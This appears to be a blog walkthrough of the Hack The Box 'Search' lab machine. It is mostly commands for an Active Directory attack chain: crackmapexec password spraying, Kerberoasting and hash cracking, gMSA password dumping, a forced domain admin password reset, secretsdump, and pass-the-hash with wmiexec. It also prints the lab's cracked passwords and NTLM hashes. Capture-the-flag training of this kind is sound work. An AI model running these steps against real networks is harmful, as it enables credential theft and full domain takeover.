Hack_The_Box_Writeups

HackTheBox – Search Walkthrough – In English

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -T5 -sCV -p- 10.10.11.129 –Pn

┌──(root㉿kali)-[/home/kali/Downloads]

└─# gobuster dir -u http://search.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,sql,txt,wpad,xlsx,xml,aspx -t 64

http://search.htb/

http://search.htb/staff

http://search.htb/#about-section

http://search.htb/images/slide_2.jpg

Testing this set of credentials using the earlier identified naming scheme using crackmapexec we are able to authenticate to AD and list shares on the machine.

┌──(root㉿kali)-[/home/kali/Downloads]

└─# crackmapexec smb search.htb  -d search.htb -u hope.sharp -p ‘IsolationIsKey?’ –shares

┌──(root㉿kali)-[/home/kali/Downloads]

└─# smbclient //search.htb/RedirectedFolders$ -U Hope.Sharp

SPN crackable

Since we are not being hunted and we got user credentials we can get a quick overview using bloodhound-python to dump active directory.

┌──(root㉿kali)-[/home/kali/Downloads/BloodHound.py]

└─# bloodhound-python -d search.htb -u hope.sharp -c All -p ‘IsolationIsKey?’ -ns 10.10.11.129

Now import the file to bloodhound software

┌──(root㉿kali)-[/home/kali/Downloads]

└─# impacket-GetUserSPNs search.htb/hope.sharp:’IsolationIsKey?’ -outputfile web_svc_kerberos

┌──(root㉿kali)-[/home/kali/Downloads]

└─# cat web_svc_kerberos

┌──(root㉿kali)-[/home/kali/Downloads]

└─# john –wordlist=rockyou.txt web_svc_kerberos

Output:

@3ONEmillionbaby

If we are lucky this might mean that the password is reused by a member of the HelpDesk group. We can get all the recursive group members using bloodhound.

Running crackmapexec against the list of usernames we can see that EDGAR.JACOBS probably reused his account password to create web_svc.

┌──(root㉿kali)-[/home/kali/Downloads]

└─# crackmapexec smb search.htb -u helpdesk -p ‘@3ONEmillionbaby’ –shares

Checking the users home directory which is in the RedirectedFolders$ smb share we find an interesting looking excel file Phishing_Attempt.xlsx.

┌──(root㉿kali)-[/home/kali/Downloads]

└─# /usr/share/doc/python3-impacket/examples/smbclient.py ‘search.htb/EDGAR.JACOBS:@3ONEmillionbaby’@search.htb

# shares

# use RedirectedFolders$

# ls

# cd edgar.jacobs

# ls

# cd Desktop

# ls

# get Phishing_Attempt.xlsx

Copying everything with CTRL + A => CTRL + C and pasting it into a new file we see the hidden column contained the password fo the usernames.

Creds

┌──(rootkali)-[/home/kali/Downloads]

└─#  cat creds | awk -F’ ‘ ‘{print $3}’ > passwords

┌──(rootkali)-[/home/kali/Downloads]

└─#  cat creds | awk -F’ ‘ ‘{print $4}’ > users

┌──(rootkali)-[/home/kali/Downloads]

└─# crackmapexec smb search.htb -u users -p passwords -d search.htb –continue-on-success –no-bruteforce

By this we get

SMB         search.htb      445    RESEARCH         [+] search.htb\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18

┌──(rootkali)-[/home/kali/Downloads]

└─# /usr/share/doc/python3-impacket/examples/smbclient.py ‘search.htb/Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18’@search.htb

# use RedirectedFolders$

# cd sierra.frye

# cd Desktop

# ls

# get user.txt

┌──(rootkali)-[/home/kali/Downloads]

└─# smbclient //search.htb/RedirectedFolders$ -U Sierra.Frye

Password: $$49=wide=STRAIGHT=jordan=28$$18

smb: \> cd \sierra.frye\

smb: \sierra.frye\> ls

smb: \sierra.frye\> cd Downloads\

smb: \sierra.frye\Downloads\> ls

smb: \sierra.frye\Downloads\> cd Backups

smb: \sierra.frye\Downloads\Backups\> get search-RESEARCH-CA.p12

smb: \sierra.frye\Downloads\Backups\> get staff.pfx

A p12 file contains a digital certificate that uses PKCS#12 (Public Key Cryptography Standard #12) encryption. It is used as a portable format for transferring personal private keys and other sensitive information. P12 files are used by various security and encryption programs. It is generally referred to as a “PFX file”.

We can try to upload this certificate to the browser (firefox).

It asks for the password. We can try to crack the password using the bellow tool.

https://github.com/crackpkcs12/crackpkcs12

┌──(rootkali)-[/home/kali/Downloads/p12tool]

└─# go run cmd/main.go crack -c /home/kali/Downloads/staff.pfx -f /home/kali/Downloads/rockyou.txt

If you are on VM then it’d take much more time. Now we have the password for the certificate. Let’s add it in our browser.

There is a specific endpoint that you can access with this certificate.

https://search.htb/staff/en-US/logon.aspx

Now we need to input the credentials of ‘Sierra’ user and access PowerShell Console.

Password: misspissy

https://search.htb/staff/en-US/logon.aspx

https://search.htb/staff/en-US/logon.aspx

Username: Sierra.FryePassword: $$49=wide=STRAIGHT=jordan=28$$18

Computer name: Research

┌──(root㉿kali)-[/home/kali/Downloads]

└─# bloodhound-python -u ‘Sierra.Frye’ -p ‘$$49=wide=STRAIGHT=jordan=28$$18’ -d search.htb -v –zip -c All,Loggedon -dc search.htb -ns 10.10.11.129

To domain admin we will go over multiple ways with the first two of them probably being patched by now.

All the ways involve reading the gMSA password of BIR-ADFS-GMSA$ first as sierra.frye. This user has in turn GenericAll over Tristan.Davies who is in the EA/DA/A groups

As we are member of ITSEC, we can read GMSA password.

BIR-ADFS-GMSA@SEARCH.HTB is a Group Managed Service Account. The group ITSEC@SEARCH.HTB can retrieve the password for the GMSA BIR-ADFS-GMSA@SEARCH.HTB

https://github.com/micahvandeusen/gMSADumper

┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]

└─# ./gMSADumper.py -u sierra.frye -p ‘$$49=wide=STRAIGHT=jordan=28$$18’ -l 10.10.11.129 -d search.htb

Output:

BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]

└─# impacket-psexec “BIR-ADFS-GMSA$”@search.htb -hashes :e1e9fd9e46d0d747e1595167eedcec0f

gMSAs use 240-byte, randomly generated complex passwords. So, it’s hard to crack.

msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword) – stores the security principals that can access the GMSA password.
msds-ManagedPassword – This attribute contains a BLOB with password information for group-managed service accounts.
msDS-ManagedPasswordId – This constructed attribute contains the key identifier for the current managed password data for a group MSA.
msDS-ManagedPasswordInterval – This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.

Based on both blogs, we can run commands as BIR-ADFS-GMSA to set an environment to access domain admin.$gmsa=Get-ADServiceAccount-Identity‘BIR-ADFS-GMSA$’-Properties‘msDS-ManagedPassword’$mp=$gmsa.‘msDS-ManagedPassword’ConvertFrom-ADManagedPasswordBlob$mp

# GMSA$gmsa=Get-ADServiceAccount-Identity‘BIR-ADFS-GMSA$’-Properties‘msDS-ManagedPassword’$mp=$gmsa.‘msDS-ManagedPassword’$secure=ConvertFrom-ADManagedPasswordBlob$mp





# Credentials$username=“BIR-ADFS-GMSA”;$password=$secure.SecureCurrentPassword;$cred=New-ObjectSystem.Management.Automation.PSCredential-ArgumentList$username,$password;Invoke-Command-ScriptBlock{whoami}-ComputerNameRESEARCH-Credential$cred

Invoke-Command -ScriptBlock { net user tristan.davies Password123! /domain } -ComputerName RESEARCH -Credential $cred

┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]

└─# crackmapexec smb search.htb -u tristan.davies -p ‘Password123!’ –shares

┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]

└─# impacket-secretsdump tristan.davies:’Password123!’@search.htb -just-dc-user Administrator

┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]

└─# impacket-wmiexec administrator@search.htb -hashes aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6

C:\>whoami

C:\>cd Users/Administrator/Desktop

C:\Users\Administrator\Desktop>dir

C:\Users\Administrator\Desktop>type root.txt

Hi, I’m saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *